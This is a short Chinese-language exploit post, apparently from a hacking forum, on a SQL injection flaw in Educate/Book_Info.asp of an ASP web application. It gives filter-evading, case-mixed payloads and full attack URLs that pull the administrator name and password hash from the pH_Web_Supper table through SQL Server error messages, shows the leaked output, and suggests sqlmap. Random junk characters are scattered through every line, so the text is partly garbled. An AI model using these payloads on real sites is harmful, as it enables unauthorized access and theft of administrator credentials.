漏洞出现在Educate/Book_Info.asp $ s7 M! T' ?" n- B7 n7 s
9 K% V' R! s& b5 k7 ]+ n9 T3 Y
此处注入点虽然过滤了一些关键字 但是我们还是可以盲注的 可以利用sqlmap跑出% S# D; i7 J$ y1 O- U
) j, J+ w5 `3 A l# K4 X
exp:如下
& z, v8 T9 ~. @8 }查询管理账号:+aNd+0=(selEct+toP+1+su_SupperName+frOm+pH_Web_Supper)
+ ~$ s4 O1 A& o: F# u* E2 y& A5 g y5 `查询管理密码:+aNd+0=(selEct+toP+1+su_Password+frOm+pH_Web_Supper)
& _4 g+ f6 x( o7 a
6 m2 y; [0 d! A* hhttp://www.xxx.com /Educate/Book_Info.asp?Param=20+aNd+0=(selEct+toP+1+su_SupperName+frOm+pH_Web_Supper)
- N3 k2 P7 _( k/ N1 n' w: |* ~: h8 e - H$ a3 {0 L" ?
Microsoft OLE DB Provider for SQL Server 错误 '80040e07'
1 Q0 C* A, g" V3 u" J
: M! C5 D9 h8 p. }9 G. z( c1 f将 nvarchar 值 'hackbase' 转换为数据类型为 int 的列时发生语法错误。
3 n. T1 C( t/ X F+ b9 }/ P# W
y% S2 i& t7 ]9 `$ C4 J" D/Educate/Book_Info.asp,行 8
& A9 j, |9 @! y% W- s! h1 V 7 P6 j+ q, m" B9 @% G
http://www.xxx.com /Educate/Book_Info.asp?Param=20+aNd+0=(selEct+toP+1+su_Password+frOm+pH_Web_Supper)
- l1 B( C8 f+ y# ~+ m j ' ^' k8 n" r+ Q+ @/ v1 G
Microsoft OLE DB Provider for SQL Server 错误 '80040e07'
8 A; _. z9 q3 Z1 l 8 I3 ]1 ^% ~" h! m9 S
将 nvarchar 值 '165706AD8319D7F95B7FC5E82FBE8F' 转换为数据类型为 int 的列时发生语法错误。
. S: u* ?( @4 v* i$ l! ~7 k, K, h. b/ l 7 U$ e1 q2 Q" f9 L* i8 S
/Educate/Book_Info.asp,行 8
8 C- ~1 I$ @# u5 f7 Z# q M |